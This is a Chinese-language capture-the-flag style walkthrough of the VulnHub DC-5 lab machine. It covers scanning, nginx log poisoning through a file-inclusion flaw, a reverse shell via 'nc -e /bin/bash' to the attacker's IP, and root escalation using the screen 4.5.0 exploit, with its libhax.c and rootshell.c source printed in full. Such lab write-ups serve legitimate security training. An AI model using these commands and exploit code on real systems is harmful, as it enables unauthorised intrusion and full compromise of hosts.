vulnhub靶场 DC-5靶机 渗透详细过程

0X01 环境部署

1.下载地址

https://www.vulnhub.com/entry/dc-5,314/

在这里插入图片描述

安装好并将网络置为NET模式
kali net模式
DC-5 net模式

在这里插入图片描述

0X02 信息收集

1.主机发现

arpscan -l

在这里插入图片描述

2.端口收集

nmap -sS 192.168.190.133

img

发现存在80端口,可以进行查看

在这里插入图片描述

3.目录扫描

python3 dirsearch.py -u http://192.168.190.133/

在这里插入图片描述

成功找到一个可以输入内容的,类似留言板的页面
http://192.168.190.133/contact.php
尝试xss payload 

在这里插入图片描述

跳转到另一个页面,可以看到网站路径应该是一个文件包含
如果一直刷新页面就会将最下面的数字进行变化,2017-2020

img

img

4.查看网站配置

img

0X03 Getshell

1.漏洞发现

nginx的配置文件路径是/etc/nginx/nginx.conf
尝试利用文件包含看是否可以得到目标文件内容

img

而且可以看到目标是存在正确和错误的日志的
尝试将一句话payload写入到日志中再利用日志进行getshell

img

2.漏洞利用

抓取网络数据包,进行写入一句话

img

可以看到写入成功

3.getshell

连接蚁剑进行反弹shell

img

4.反弹shell

kali开启监听   			 nc -lvnp 5678
蚁剑进行反弹shell			nc -e /bin/bash 192.168.190.128 5678

img

img

进行交互式的:python -c 'import pty;pty.spawn("/bin/bash")'

img

0X04 提权

1.当前权限

whoami    # www-data

img

查看内核版本信息/系统版本信息
uname -a
cat /etc/issue

img

2.常用提权

sudo -l
find /-perm -u=s -type f 2>/dev/null

img

3.漏洞提权

searchsploit screen 4.5.0

img

cp /usr/share/exploitdb/exploits/linux/local/41154.sh /home/kali/Desktop/41154.sh

cp /usr/share/exploitdb/exploits/linux/local/41154.sh /home/kali/Desktop/41152.txt

d99f1c0e4a77a9ee3279239dc10003a3.png

5e8d9d19ebd13a4cf540f1164417328f.png

cat 41154.sh # 查看文件内容

img

文档中所写是,文件是需要三个步骤完成
第一步:将diam写入libhax.c文件中,在执行编译的命令生成libhax.so文件
vim libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
attribute ((constructor))
void dropshell(void){
chown(“/tmp/rootshell”, 0, 0);
chmod(“/tmp/rootshell”, 04755);
unlink(“/etc/ld.so.preload”);
printf(“[+] done!\n”);
}

cat libhax.c

0ff3ae4d78b604e5055870fb06ad8c3f.png

编译
gcc -fPIC -shared -ldl -o libhax.so libhax.c

img

第二步:将文件中的C语言写入到rootshell.c文件中,并编译
vim rootshell.c

#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp(“/bin/sh”, NULL, NULL);
}

cat rootshell.c

779626118c9b1899779957827e1c2931.png

编译
gcc -o rootshell rootshell.c

img

第三步:将所使用过的代码删除掉

img

将三个文件利用蚁剑上传到目标机上

img

4.开始提权

ls
chmod +x 41154.sh

img

./41154.sh
whoami
cd /root
ls 
cat thisistheflag.txt

img

0X05 总结

1.首先收集信息,真实ip,端口,网站目录,网站部署部件等
2.利用文件包含来getshell
3.查看权限,根据suid中的screen 4.5.0进行提权
4.提权成功查看flag
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值